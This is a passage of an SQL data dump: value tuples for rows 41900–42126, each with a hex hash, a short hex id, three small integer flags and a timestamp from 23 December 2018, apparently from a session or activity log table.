(41900, 'ce996412bcd236867e11bafdf47cdc82', 'b6169a438d71e404', 0, 2, 1, '2018-12-23 09:27:24'),
(41901, 'aaa537dabfcdfa661e1e4a050a672535', '57a9d45c2fb49483', 0, 2, 1, '2018-12-23 09:30:36'),
(41902, 'fb02d849dc0fb6862656e9345d7cfbe0', 'da6c922121ca1f89', 0, 2, 1, '2018-12-23 09:31:08'),
(41903, 'aaa537dabfcdfa661e1e4a050a672535', '57a9d45c2fb49483', 0, 2, 1, '2018-12-23 09:31:10'),
(41904, 'aaa537dabfcdfa661e1e4a050a672535', '57a9d45c2fb49483', 0, 2, 1, '2018-12-23 09:31:24'),
(41905, 'ad08d06d5250e23c1a2cf5ba72fb610f', 'd50d7502174878db', 0, 2, 1, '2018-12-23 09:31:26'),
(41906, 'aaa537dabfcdfa661e1e4a050a672535', '57a9d45c2fb49483', 0, 2, 1, '2018-12-23 09:31:37'),
(41907, '0bac0f11878628a42c6034d4e25ed248', '47009d7b5da44c9d', 0, 2, 1, '2018-12-23 09:32:05'),
(41908, 'aaa537dabfcdfa661e1e4a050a672535', '57a9d45c2fb49483', 0, 2, 1, '2018-12-23 09:32:10'),
(41909, 'f0929b3383ce616e4340ac44d9dac1b2', 'f8f70c95a9dd1c3e', 0, 2, 1, '2018-12-23 09:32:56'),
(41910, 'f38e023b507c480101b5b4504deba441', 'ab8367dfea54bd3e', 0, 2, 1, '2018-12-23 09:33:28'),
(41911, '8a82875d9889926ca9083ad423a84055', 'b7f3f6be23503542', 0, 2, 1, '2018-12-23 09:33:28'),
(41912, 'fca4ce9efddb4b14a0b248330db65bff', '20fc25ffac9ae1e3', 0, 2, 1, '2018-12-23 09:34:05'),
(41913, 'be84fb80f40c4a12f347fa5cadb918e7', 'e2f81c440b409e70', 0, 2, 1, '2018-12-23 09:34:19'),
(41914, 'fca4ce9efddb4b14a0b248330db65bff', '20fc25ffac9ae1e3', 0, 2, 1, '2018-12-23 09:34:26'),
(41915, 'fca4ce9efddb4b14a0b248330db65bff', '20fc25ffac9ae1e3', 0, 2, 1, '2018-12-23 09:34:44'),
(41916, 'ba3c32a1c19ccdb6ce56849f3e89f5d4', '84ee944e9bc9f866', 0, 2, 1, '2018-12-23 09:35:46'),
(41917, '4170e049af4852302eece53d79dd607e', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-12-23 09:37:52'),
(41918, 'aaa537dabfcdfa661e1e4a050a672535', '57a9d45c2fb49483', 0, 2, 1, '2018-12-23 09:37:57'),
(41919, 'a92d42cd75296ad34bad7321710bcf82', '7af6cb768c9e29e8', 0, 2, 1, '2018-12-23 09:40:08'),
(41920, '09388e918afc43431a3aaae281111a38', '9c67046f3d7c037a', 0, 2, 1, '2018-12-23 09:41:42'),
(41921, 'dcdb29f4e5e7d6cc602debf2d9409026', 'a783a1253a9fde8e', 0, 2, 1, '2018-12-23 09:42:06'),
(41922, 'e1561f95ef69e550f150581099eed0e3', 'e36eb3793880e0eb', 0, 2, 1, '2018-12-23 09:43:40'),
(41923, 'a92d42cd75296ad34bad7321710bcf82', '7af6cb768c9e29e8', 0, 2, 1, '2018-12-23 09:44:12'),
(41924, 'a92d42cd75296ad34bad7321710bcf82', '7af6cb768c9e29e8', 0, 2, 1, '2018-12-23 09:46:03'),
(41925, '2d6976b978bf45afa158578b19d135e6', '19da5e4dee93a82b', 0, 2, 1, '2018-12-23 09:46:20'),
(41926, '56a068581444cda87ad2de907cc27b09', '19da5e4dee93a82b', 0, 2, 1, '2018-12-23 09:46:53'),
(41927, 'a4bdfea5dbfe4d1a4e90f14bd0e26bab', '90d45a59b7b34636', 0, 2, 1, '2018-12-23 09:49:59'),
(41928, 'be252186a5e0d253df7cf384cffd0e96', '11a46b02ca3737b9', 0, 2, 1, '2018-12-23 09:51:16'),
(41929, 'ba3c32a1c19ccdb6ce56849f3e89f5d4', '84ee944e9bc9f866', 0, 2, 1, '2018-12-23 09:51:49'),
(41930, '9d40b92415fd98eb1ac9ee6a7ba53ee8', '83bb13387505b354', 0, 2, 1, '2018-12-23 09:54:15'),
(41931, '9d40b92415fd98eb1ac9ee6a7ba53ee8', '83bb13387505b354', 0, 2, 1, '2018-12-23 09:56:54'),
(41932, 'e26529811f189e49468f2650a5bfe8b7', 'f6269ce34ab6a362', 0, 2, 1, '2018-12-23 09:58:38'),
(41933, 'dcdb29f4e5e7d6cc602debf2d9409026', 'a783a1253a9fde8e', 0, 2, 1, '2018-12-23 09:59:19'),
(41934, 'abec58cbeaf7f205c514986bcf3d2898', '220b6bed49713ca3', 0, 2, 1, '2018-12-23 09:59:34'),
(41935, 'dcdb29f4e5e7d6cc602debf2d9409026', 'a783a1253a9fde8e', 0, 2, 1, '2018-12-23 10:00:40'),
(41936, 'e26529811f189e49468f2650a5bfe8b7', 'f6269ce34ab6a362', 0, 2, 1, '2018-12-23 10:00:52'),
(41937, 'acabbf306bce4af58f9870d92fa3ba78', '57587ada79ea2aa6', 0, 2, 1, '2018-12-23 10:02:20'),
(41938, 'ba3c32a1c19ccdb6ce56849f3e89f5d4', '84ee944e9bc9f866', 0, 2, 1, '2018-12-23 10:02:25'),
(41939, 'ab5dd288d9f400265fde01775b79a8fe', '1ec75219d7482e28', 0, 2, 1, '2018-12-23 10:02:31'),
(41940, 'acabbf306bce4af58f9870d92fa3ba78', '57587ada79ea2aa6', 0, 2, 1, '2018-12-23 10:02:33'),
(41941, 'acabbf306bce4af58f9870d92fa3ba78', '57587ada79ea2aa6', 0, 2, 1, '2018-12-23 10:02:39'),
(41942, 'e26529811f189e49468f2650a5bfe8b7', 'f6269ce34ab6a362', 0, 2, 1, '2018-12-23 10:02:40'),
(41943, 'abec58cbeaf7f205c514986bcf3d2898', '220b6bed49713ca3', 0, 2, 1, '2018-12-23 10:02:44'),
(41944, '70ac1692195c32cb6a2ce944e99fd4a5', '4c07673592205f17', 0, 2, 1, '2018-12-23 10:02:45'),
(41945, '3c915334bff21599d56f6816c15cfe3a', '503a514a8daa32a7', 0, 2, 1, '2018-12-23 10:02:52'),
(41946, 'd3da1f97aa88a86f29a57ef244a445e8', 'cd739182be9070e6', 0, 2, 1, '2018-12-23 10:03:10'),
(41947, '0e8f24a10a55ffc50b9f200366da9a22', 'f8f70c95a9dd1c3e', 0, 2, 1, '2018-12-23 10:03:12'),
(41948, 'acabbf306bce4af58f9870d92fa3ba78', '57587ada79ea2aa6', 0, 2, 1, '2018-12-23 10:03:21'),
(41949, '3c915334bff21599d56f6816c15cfe3a', '503a514a8daa32a7', 0, 2, 1, '2018-12-23 10:03:27'),
(41950, '3ad1cb833da0626cbcbfaa5ab5df0934', '7501b42c35accff7', 0, 2, 1, '2018-12-23 10:03:34'),
(41951, 'fe8bdede92152b815cf72c3dcd266ca5', '4f8f2dbd3b012e31', 0, 2, 1, '2018-12-23 10:04:26'),
(41952, 'fe8bdede92152b815cf72c3dcd266ca5', '4f8f2dbd3b012e31', 0, 2, 1, '2018-12-23 10:04:48'),
(41953, 'acabbf306bce4af58f9870d92fa3ba78', '57587ada79ea2aa6', 0, 2, 1, '2018-12-23 10:05:03'),
(41954, '3873d473e3cf25dbfd576ad671bf26e3', '68d6262f427661c5', 0, 2, 1, '2018-12-23 10:05:25'),
(41955, '383912ac1aff5dd4c7303895d8b124d2', '960d12b6c14f65ca', 0, 2, 1, '2018-12-23 10:05:32'),
(41956, '70ac1692195c32cb6a2ce944e99fd4a5', '4c07673592205f17', 0, 2, 1, '2018-12-23 10:05:37'),
(41957, '852e5202fc47d583bd0aba7469b05a3d', '32b169e936bbe5df', 0, 2, 1, '2018-12-23 10:05:43'),
(41958, 'fe8bdede92152b815cf72c3dcd266ca5', '4f8f2dbd3b012e31', 0, 2, 1, '2018-12-23 10:05:53'),
(41959, '852e5202fc47d583bd0aba7469b05a3d', '32b169e936bbe5df', 0, 2, 1, '2018-12-23 10:05:55'),
(41960, 'fe8bdede92152b815cf72c3dcd266ca5', '4f8f2dbd3b012e31', 0, 2, 1, '2018-12-23 10:06:00'),
(41961, 'fe8bdede92152b815cf72c3dcd266ca5', '4f8f2dbd3b012e31', 0, 2, 1, '2018-12-23 10:06:26'),
(41962, '082a0c626d073290b620069dda4774ff', '51df446c19685386', 0, 2, 1, '2018-12-23 10:06:41'),
(41963, 'e26529811f189e49468f2650a5bfe8b7', 'f6269ce34ab6a362', 0, 2, 1, '2018-12-23 10:06:48'),
(41964, '082a0c626d073290b620069dda4774ff', '51df446c19685386', 0, 2, 1, '2018-12-23 10:06:56'),
(41965, '60e22a5b8bc1be8a4a32fabb2635dccf', '6d8223de99afd563', 0, 2, 1, '2018-12-23 10:07:06'),
(41966, '9855e06bb3db0562c47770c4c8abd5dc', '9a5016d6ccef014c', 0, 2, 1, '2018-12-23 10:07:20'),
(41967, '9855e06bb3db0562c47770c4c8abd5dc', '9a5016d6ccef014c', 0, 2, 1, '2018-12-23 10:07:49'),
(41968, '60e22a5b8bc1be8a4a32fabb2635dccf', '6d8223de99afd563', 0, 2, 1, '2018-12-23 10:08:12'),
(41969, '60e22a5b8bc1be8a4a32fabb2635dccf', '6d8223de99afd563', 0, 2, 1, '2018-12-23 10:08:18'),
(41970, '3c915334bff21599d56f6816c15cfe3a', '503a514a8daa32a7', 0, 2, 1, '2018-12-23 10:08:32'),
(41971, 'abec58cbeaf7f205c514986bcf3d2898', '220b6bed49713ca3', 0, 2, 1, '2018-12-23 10:08:43'),
(41972, 'ba3c32a1c19ccdb6ce56849f3e89f5d4', '84ee944e9bc9f866', 0, 2, 1, '2018-12-23 10:09:09'),
(41973, '435dd571ba864ef6d61189bed7186b45', 'eefe72222194052a', 0, 2, 1, '2018-12-23 10:10:21'),
(41974, 'c454df882430f4341d7a82b595227218', 'f2be47c7b5e54850', 0, 2, 1, '2018-12-23 10:10:32'),
(41975, '49522149848bb3415006f9c3c45eefd9', 'c858904cdd51199c', 0, 2, 1, '2018-12-23 10:10:44'),
(41976, '334efd8a9f3ac58fdaf15de891b36fcb', 'c1205afb68feabf0', 0, 2, 1, '2018-12-23 10:12:33'),
(41977, '60e22a5b8bc1be8a4a32fabb2635dccf', '6d8223de99afd563', 0, 2, 1, '2018-12-23 10:12:48'),
(41978, 'd46d0f45e8f830ad00ef583ba21a6ae6', '9968c5be4a7971a2', 0, 2, 1, '2018-12-23 10:13:25'),
(41979, '60e22a5b8bc1be8a4a32fabb2635dccf', '6d8223de99afd563', 0, 2, 1, '2018-12-23 10:13:29'),
(41980, '9d02575b15122d4b376d77b0565341c8', '5cfa5cadedc245cc', 0, 2, 1, '2018-12-23 10:13:30'),
(41981, 'cdfb48b1a9706b11e24cf11709ceb866', '29608a328df169fa', 0, 2, 1, '2018-12-23 10:13:51'),
(41982, '2ed62e6ebcfccd1ec5a882aed9b445b5', '0590f2c35fb16469', 0, 2, 1, '2018-12-23 10:15:34'),
(41983, '941aa6b0432880e65e3422dcd5097db3', '2034f09284a4c7ca', 0, 2, 1, '2018-12-23 10:17:20'),
(41984, '9d02575b15122d4b376d77b0565341c8', '5cfa5cadedc245cc', 0, 2, 1, '2018-12-23 10:17:35'),
(41985, 'fdadc2c9c8c46f912b2ff2814ae45da5', '03656dd438efd1a5', 0, 2, 1, '2018-12-23 10:18:06'),
(41986, '668d96b25be8566aab509c6a7c37648d', 'f8d002c7b8b76490', 0, 2, 1, '2018-12-23 10:18:13'),
(41987, 'abec58cbeaf7f205c514986bcf3d2898', '220b6bed49713ca3', 0, 2, 1, '2018-12-23 10:19:32'),
(41988, 'abec58cbeaf7f205c514986bcf3d2898', '220b6bed49713ca3', 0, 2, 1, '2018-12-23 10:20:08'),
(41989, '638ba8219ea670d6c807de7e2870c1b3', '0d6d214e577e9800', 0, 2, 1, '2018-12-23 10:20:11'),
(41990, 'c6d6fd8b2cbf1a0c4299f2195166a634', 'd962df27d9158431', 0, 2, 1, '2018-12-23 10:22:50'),
(41991, '0669e805a6ac37b2cf9bef9e41b18435', '6f8cac538d104962', 0, 2, 1, '2018-12-23 10:23:33'),
(41992, 'abec58cbeaf7f205c514986bcf3d2898', '220b6bed49713ca3', 0, 2, 1, '2018-12-23 10:23:39'),
(41993, '73a7155fb8c7822ca8c517718e7139e2', '93f30eaefda9d8c4', 0, 2, 1, '2018-12-23 10:24:44'),
(41994, 'c6d6fd8b2cbf1a0c4299f2195166a634', 'd962df27d9158431', 0, 2, 1, '2018-12-23 10:25:06'),
(41995, 'be252186a5e0d253df7cf384cffd0e96', '11a46b02ca3737b9', 0, 2, 1, '2018-12-23 10:25:20'),
(41996, 'ec7235184335837a0707f9000c31ae72', '3bd36d6429a9f245', 0, 2, 1, '2018-12-23 10:25:41'),
(41997, '159014ef2721b738dfc5dafa6cd80a6a', '9b439e4e6dd53e8a', 0, 2, 1, '2018-12-23 10:25:59'),
(41998, '623075f00a52b815c49e6f2be605e3a2', 'd689ca8aa9b1427a', 0, 2, 1, '2018-12-23 10:26:37'),
(41999, 'ba3c32a1c19ccdb6ce56849f3e89f5d4', '84ee944e9bc9f866', 0, 2, 1, '2018-12-23 10:26:40'),
(42000, 'd56c509e91ad2d2c01076ab9df9e1b2e', 'baa8d16c1a4e5230', 0, 2, 1, '2018-12-23 10:30:56'),
(42001, 'd56c509e91ad2d2c01076ab9df9e1b2e', 'baa8d16c1a4e5230', 0, 2, 1, '2018-12-23 10:31:07'),
(42002, 'ba3c32a1c19ccdb6ce56849f3e89f5d4', '84ee944e9bc9f866', 0, 2, 1, '2018-12-23 10:32:05'),
(42003, 'ba3c32a1c19ccdb6ce56849f3e89f5d4', '84ee944e9bc9f866', 0, 2, 1, '2018-12-23 10:37:48'),
(42004, 'dcdb29f4e5e7d6cc602debf2d9409026', 'a783a1253a9fde8e', 0, 2, 1, '2018-12-23 10:37:59'),
(42005, 'cf1b3925e9ea214c32be44304178f8e2', '2034f09284a4c7ca', 0, 2, 1, '2018-12-23 10:39:16'),
(42006, 'dcdb29f4e5e7d6cc602debf2d9409026', 'a783a1253a9fde8e', 0, 2, 1, '2018-12-23 10:40:30'),
(42007, '3aa9c0da83ac25a5b56ac234fd48a555', '4a9bbb053e611d1d', 0, 2, 1, '2018-12-23 10:40:44'),
(42008, '3aa9c0da83ac25a5b56ac234fd48a555', '4a9bbb053e611d1d', 0, 2, 1, '2018-12-23 10:40:55'),
(42009, 'abec58cbeaf7f205c514986bcf3d2898', '220b6bed49713ca3', 0, 2, 1, '2018-12-23 10:41:51'),
(42010, '7f79bc9943cb159dd99ef5901cd4bb8e', '6521fe834dce4d43', 0, 2, 1, '2018-12-23 10:43:04'),
(42011, '1782bcc2ff5aecf31a6b8d7ebc7e6b38', '5ec2e5453a24b8d5', 0, 2, 1, '2018-12-23 10:44:05'),
(42012, '45cad11a3239768aa61a30622ac1db75', '4ec4360c2d0b7d93', 0, 2, 1, '2018-12-23 10:44:29'),
(42013, 'ba3c32a1c19ccdb6ce56849f3e89f5d4', '84ee944e9bc9f866', 0, 2, 1, '2018-12-23 10:44:48'),
(42014, 'aaa537dabfcdfa661e1e4a050a672535', '57a9d45c2fb49483', 0, 2, 1, '2018-12-23 10:50:31'),
(42015, '45cad11a3239768aa61a30622ac1db75', '4ec4360c2d0b7d93', 0, 2, 1, '2018-12-23 10:52:53'),
(42016, 'cf1b3925e9ea214c32be44304178f8e2', '2034f09284a4c7ca', 0, 2, 1, '2018-12-23 10:53:33'),
(42017, 'f0052ce88453b9a2aeb885f81fc98d99', '52aa9e0502f94486', 0, 2, 1, '2018-12-23 10:57:22'),
(42018, 'f0052ce88453b9a2aeb885f81fc98d99', '52aa9e0502f94486', 0, 2, 1, '2018-12-23 10:57:58'),
(42019, '4a076270db890b36d23ebb27f3114fc1', '0cb874f42fc5f416', 0, 2, 1, '2018-12-23 10:58:02'),
(42020, '4a076270db890b36d23ebb27f3114fc1', '0cb874f42fc5f416', 0, 2, 1, '2018-12-23 10:58:30'),
(42021, '2debd590e7c5aedd5c1fcbee684a97ea', '9b439e4e6dd53e8a', 0, 2, 1, '2018-12-23 10:58:37'),
(42022, 'abec58cbeaf7f205c514986bcf3d2898', '220b6bed49713ca3', 0, 2, 1, '2018-12-23 10:59:36'),
(42023, 'abec58cbeaf7f205c514986bcf3d2898', '220b6bed49713ca3', 0, 2, 1, '2018-12-23 11:02:23'),
(42024, 'b1b81518b82ec77b2c0ad1cd84b67640', '5ec2e5453a24b8d5', 0, 2, 1, '2018-12-23 11:03:18'),
(42025, 'b1b81518b82ec77b2c0ad1cd84b67640', '5ec2e5453a24b8d5', 0, 2, 1, '2018-12-23 11:03:45'),
(42026, '2b79eaf2aa5c86506dff3ed8494bd5b5', '7cecab81fe29f22c', 0, 2, 1, '2018-12-23 11:05:47'),
(42027, '4279c06ca3dcde815f806ff5c5afca53', 'fda985193413b262', 0, 2, 1, '2018-12-23 11:09:16'),
(42028, '852e5202fc47d583bd0aba7469b05a3d', '32b169e936bbe5df', 0, 2, 1, '2018-12-23 11:10:30'),
(42029, 'aaa537dabfcdfa661e1e4a050a672535', '57a9d45c2fb49483', 0, 2, 1, '2018-12-23 11:10:33'),
(42030, 'abec58cbeaf7f205c514986bcf3d2898', '220b6bed49713ca3', 0, 2, 1, '2018-12-23 11:11:50'),
(42031, '7c9ff1c9c4881cfb92e33c123449f235', '4a7924dd4418962c', 0, 2, 1, '2018-12-23 11:15:36'),
(42032, 'df38b3b75f857da0c72c5a5691960ec9', 'b512fd170584454c', 0, 2, 1, '2018-12-23 11:16:19'),
(42033, 'b08a6b9b7b44bf52199ccc08a569accb', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2018-12-23 11:16:25'),
(42034, '7c9ff1c9c4881cfb92e33c123449f235', '4a7924dd4418962c', 0, 2, 1, '2018-12-23 11:16:32'),
(42035, 'b08a6b9b7b44bf52199ccc08a569accb', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2018-12-23 11:16:41'),
(42036, '73a7155fb8c7822ca8c517718e7139e2', '93f30eaefda9d8c4', 0, 2, 1, '2018-12-23 11:19:30'),
(42037, '7c9ff1c9c4881cfb92e33c123449f235', '4a7924dd4418962c', 0, 2, 1, '2018-12-23 11:24:34'),
(42038, 'd24cc498f338e51a2f4e2cc018dd8614', 'b3bf3468e0c56f69', 0, 2, 1, '2018-12-23 11:32:38'),
(42039, 'ab5dd288d9f400265fde01775b79a8fe', '1ec75219d7482e28', 0, 2, 1, '2018-12-23 11:38:45'),
(42040, 'acabbf306bce4af58f9870d92fa3ba78', '57587ada79ea2aa6', 0, 2, 1, '2018-12-23 11:42:18'),
(42041, 'cb649155aa7f49d2f3fd83d1d9c1b895', '1838bf2071834f66', 0, 2, 1, '2018-12-23 11:42:35'),
(42042, '70ac1692195c32cb6a2ce944e99fd4a5', '4c07673592205f17', 0, 2, 1, '2018-12-23 11:42:37'),
(42043, '4170e049af4852302eece53d79dd607e', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-12-23 11:44:01'),
(42044, '0024374ae19b1b951c276908dcc4bab7', 'fcaa3c8d44082e09', 0, 2, 1, '2018-12-23 11:46:41'),
(42045, '559d10a50c6a97da3dbf9196be241d3d', '865304eb84ad9746', 0, 2, 1, '2018-12-23 11:59:58'),
(42046, '0024374ae19b1b951c276908dcc4bab7', 'fcaa3c8d44082e09', 0, 2, 1, '2018-12-23 12:00:03'),
(42047, '0024374ae19b1b951c276908dcc4bab7', 'fcaa3c8d44082e09', 0, 2, 1, '2018-12-23 12:00:23'),
(42048, '2cee475ff086aec68ae26b37ac713801', 'f19010d8a5f137d0', 0, 2, 1, '2018-12-23 12:03:23'),
(42049, 'acabbf306bce4af58f9870d92fa3ba78', '57587ada79ea2aa6', 0, 2, 1, '2018-12-23 12:03:28'),
(42050, '3ad1cb833da0626cbcbfaa5ab5df0934', '7501b42c35accff7', 0, 2, 1, '2018-12-23 12:03:31'),
(42051, 'ee842d7ce336375cba23d59f1ae0bb18', 'cbceb37e4a508af3', 0, 2, 1, '2018-12-23 12:03:41'),
(42052, '383912ac1aff5dd4c7303895d8b124d2', '960d12b6c14f65ca', 0, 2, 1, '2018-12-23 12:03:53'),
(42053, '3c915334bff21599d56f6816c15cfe3a', '503a514a8daa32a7', 0, 2, 1, '2018-12-23 12:03:57'),
(42054, '0db8f8c524c2dbd4a3189e4032c9e950', '34ec142c805c34fe', 0, 2, 1, '2018-12-23 12:03:58'),
(42055, 'acabbf306bce4af58f9870d92fa3ba78', '57587ada79ea2aa6', 0, 2, 1, '2018-12-23 12:04:01'),
(42056, 'ee842d7ce336375cba23d59f1ae0bb18', 'cbceb37e4a508af3', 0, 2, 1, '2018-12-23 12:04:01'),
(42057, '9855e06bb3db0562c47770c4c8abd5dc', '9a5016d6ccef014c', 0, 2, 1, '2018-12-23 12:04:01'),
(42058, 'bc8c341542c8f0860e7c12c67b27632e', 'c454d725c5518f16', 0, 2, 1, '2018-12-23 12:04:02'),
(42059, '3272b29d5fed535a7a3041146a18add6', '8a144e5fc2e94311', 0, 2, 1, '2018-12-23 12:04:09'),
(42060, '3ad1cb833da0626cbcbfaa5ab5df0934', '7501b42c35accff7', 0, 2, 1, '2018-12-23 12:04:09'),
(42061, 'aabe4df217585ab8c92dfa34a6ed942c', '9f1d0a97bfbdc5c0', 0, 2, 1, '2018-12-23 12:04:09'),
(42062, '70ac1692195c32cb6a2ce944e99fd4a5', '4c07673592205f17', 0, 2, 1, '2018-12-23 12:04:10'),
(42063, 'acabbf306bce4af58f9870d92fa3ba78', '57587ada79ea2aa6', 0, 2, 1, '2018-12-23 12:04:16'),
(42064, '73a7155fb8c7822ca8c517718e7139e2', '93f30eaefda9d8c4', 0, 2, 1, '2018-12-23 12:04:19'),
(42065, '9d4ced31f73a09cf863b2593cf5b1727', '320bf2e21f88f143', 0, 2, 1, '2018-12-23 12:04:19'),
(42066, '09388e918afc43431a3aaae281111a38', '9c67046f3d7c037a', 0, 2, 1, '2018-12-23 12:04:32'),
(42067, '9855e06bb3db0562c47770c4c8abd5dc', '9a5016d6ccef014c', 0, 2, 1, '2018-12-23 12:04:39'),
(42068, '70ac1692195c32cb6a2ce944e99fd4a5', '4c07673592205f17', 0, 2, 1, '2018-12-23 12:04:41'),
(42069, 'acabbf306bce4af58f9870d92fa3ba78', '57587ada79ea2aa6', 0, 2, 1, '2018-12-23 12:04:44'),
(42070, '383912ac1aff5dd4c7303895d8b124d2', '960d12b6c14f65ca', 0, 2, 1, '2018-12-23 12:04:49'),
(42071, '3c915334bff21599d56f6816c15cfe3a', '503a514a8daa32a7', 0, 2, 1, '2018-12-23 12:05:02'),
(42072, 'acabbf306bce4af58f9870d92fa3ba78', '57587ada79ea2aa6', 0, 2, 1, '2018-12-23 12:05:05'),
(42073, '2e66e8d7fc8e9931d991c5bc751f8c50', 'c321463a6bfd24ce', 0, 2, 1, '2018-12-23 12:05:11'),
(42074, '70ac1692195c32cb6a2ce944e99fd4a5', '4c07673592205f17', 0, 2, 1, '2018-12-23 12:05:12'),
(42075, '4ace707194d9dc94c27e2056ea47b268', '67d9c3341cc72093', 0, 2, 1, '2018-12-23 12:05:22'),
(42076, 'ab5dd288d9f400265fde01775b79a8fe', '1ec75219d7482e28', 0, 2, 1, '2018-12-23 12:05:27'),
(42077, '2e66e8d7fc8e9931d991c5bc751f8c50', 'c321463a6bfd24ce', 0, 2, 1, '2018-12-23 12:05:32'),
(42078, '3c915334bff21599d56f6816c15cfe3a', '503a514a8daa32a7', 0, 2, 1, '2018-12-23 12:05:38'),
(42079, '70ac1692195c32cb6a2ce944e99fd4a5', '4c07673592205f17', 0, 2, 1, '2018-12-23 12:05:44'),
(42080, '4170e049af4852302eece53d79dd607e', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-12-23 12:05:50'),
(42081, '3ad1cb833da0626cbcbfaa5ab5df0934', '7501b42c35accff7', 0, 2, 1, '2018-12-23 12:05:51'),
(42082, '8d3e847a0ec5ace8a9d7026562e4d989', '1d9c54d0b37930ed', 0, 2, 1, '2018-12-23 12:05:59'),
(42083, '4170e049af4852302eece53d79dd607e', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-12-23 12:06:02'),
(42084, 'ee842d7ce336375cba23d59f1ae0bb18', 'cbceb37e4a508af3', 0, 2, 1, '2018-12-23 12:06:04'),
(42085, 'acabbf306bce4af58f9870d92fa3ba78', '57587ada79ea2aa6', 0, 2, 1, '2018-12-23 12:06:05'),
(42086, 'e8d680b115473696150d7701fdfdb4c8', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-23 12:06:06'),
(42087, '8d3e847a0ec5ace8a9d7026562e4d989', '1d9c54d0b37930ed', 0, 2, 1, '2018-12-23 12:06:06'),
(42088, '0e8f24a10a55ffc50b9f200366da9a22', 'f8f70c95a9dd1c3e', 0, 2, 1, '2018-12-23 12:06:10'),
(42089, 'aabe4df217585ab8c92dfa34a6ed942c', '9f1d0a97bfbdc5c0', 0, 2, 1, '2018-12-23 12:06:16'),
(42090, '70ac1692195c32cb6a2ce944e99fd4a5', '4c07673592205f17', 0, 2, 1, '2018-12-23 12:06:16'),
(42091, '4170e049af4852302eece53d79dd607e', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-12-23 12:06:25'),
(42092, '8f502b602770ade58fccedb1cdd8e055', '0b83b588375e9508', 0, 2, 1, '2018-12-23 12:06:25'),
(42093, '9ccf02a97415006443ba3b9d6cd6df14', '81070426ca16cd24', 0, 2, 1, '2018-12-23 12:06:27'),
(42094, '8d3e847a0ec5ace8a9d7026562e4d989', '1d9c54d0b37930ed', 0, 2, 1, '2018-12-23 12:06:31'),
(42095, '3c915334bff21599d56f6816c15cfe3a', '503a514a8daa32a7', 0, 2, 1, '2018-12-23 12:06:32'),
(42096, '686c9d40e86275d06df24f88d8a9a782', '19ac418837a1bfb6', 0, 2, 1, '2018-12-23 12:06:34'),
(42097, '70ac1692195c32cb6a2ce944e99fd4a5', '4c07673592205f17', 0, 2, 1, '2018-12-23 12:06:40'),
(42098, 'e8d680b115473696150d7701fdfdb4c8', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-23 12:06:40'),
(42099, '3ad1cb833da0626cbcbfaa5ab5df0934', '7501b42c35accff7', 0, 2, 1, '2018-12-23 12:06:49'),
(42100, '171058c0742c5f38d049fb57aa5ce551', '65fb1a08fe2b5aab', 0, 2, 1, '2018-12-23 12:06:49'),
(42101, 'df38b3b75f857da0c72c5a5691960ec9', 'b512fd170584454c', 0, 2, 1, '2018-12-23 12:06:55'),
(42102, '383912ac1aff5dd4c7303895d8b124d2', '960d12b6c14f65ca', 0, 2, 1, '2018-12-23 12:06:57'),
(42103, 'acabbf306bce4af58f9870d92fa3ba78', '57587ada79ea2aa6', 0, 2, 1, '2018-12-23 12:06:57'),
(42104, '4bbcd1b06904ba5635edd92b3f98c3cd', 'c1afa73671a6ae95', 0, 2, 1, '2018-12-23 12:07:06'),
(42105, '142481f04f80f1652de1a4113df11100', 'e74a2ac966dcd07f', 0, 2, 1, '2018-12-23 12:07:10'),
(42106, 'acabbf306bce4af58f9870d92fa3ba78', '57587ada79ea2aa6', 0, 2, 1, '2018-12-23 12:07:15'),
(42107, '9855e06bb3db0562c47770c4c8abd5dc', '9a5016d6ccef014c', 0, 2, 1, '2018-12-23 12:07:18'),
(42108, '9ccf02a97415006443ba3b9d6cd6df14', '81070426ca16cd24', 0, 2, 1, '2018-12-23 12:07:22'),
(42109, '8d3e847a0ec5ace8a9d7026562e4d989', '1d9c54d0b37930ed', 0, 2, 1, '2018-12-23 12:07:37'),
(42110, 'aabe4df217585ab8c92dfa34a6ed942c', '9f1d0a97bfbdc5c0', 0, 2, 1, '2018-12-23 12:07:44'),
(42111, 'acabbf306bce4af58f9870d92fa3ba78', '57587ada79ea2aa6', 0, 2, 1, '2018-12-23 12:07:49'),
(42112, 'aff8c97f3b9bdefdc1c22eaed5eaa62c', '049dbeed11095c77', 0, 2, 1, '2018-12-23 12:07:49'),
(42113, '3c915334bff21599d56f6816c15cfe3a', '503a514a8daa32a7', 0, 2, 1, '2018-12-23 12:08:09'),
(42114, '171058c0742c5f38d049fb57aa5ce551', '65fb1a08fe2b5aab', 0, 2, 1, '2018-12-23 12:08:20'),
(42115, '70ac1692195c32cb6a2ce944e99fd4a5', '4c07673592205f17', 0, 2, 1, '2018-12-23 12:08:30'),
(42116, '9855e06bb3db0562c47770c4c8abd5dc', '9a5016d6ccef014c', 0, 2, 1, '2018-12-23 12:08:30'),
(42117, '6203ffe3368401f4e4a97a27e68402da', '546887b39507976e', 0, 2, 1, '2018-12-23 12:08:33'),
(42118, '4170e049af4852302eece53d79dd607e', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-12-23 12:08:37'),
(42119, 'aabe4df217585ab8c92dfa34a6ed942c', '9f1d0a97bfbdc5c0', 0, 2, 1, '2018-12-23 12:08:47'),
(42120, 'acabbf306bce4af58f9870d92fa3ba78', '57587ada79ea2aa6', 0, 2, 1, '2018-12-23 12:08:55'),
(42121, '9855e06bb3db0562c47770c4c8abd5dc', '9a5016d6ccef014c', 0, 2, 1, '2018-12-23 12:08:58'),
(42122, '9855e06bb3db0562c47770c4c8abd5dc', '9a5016d6ccef014c', 0, 2, 1, '2018-12-23 12:09:10'),
(42123, '171058c0742c5f38d049fb57aa5ce551', '65fb1a08fe2b5aab', 0, 2, 1, '2018-12-23 12:09:10'),
(42124, '852e5202fc47d583bd0aba7469b05a3d', '32b169e936bbe5df', 0, 2, 1, '2018-12-23 12:09:13'),
(42125, 'acabbf306bce4af58f9870d92fa3ba78', '57587ada79ea2aa6', 0, 2, 1, '2018-12-23 12:09:14'),
(42126, '8f502b602770ade58fccedb1cdd8e055', '0b83b588375e9508', 0, 2, 1, '2018-12-23 12:09:53'),
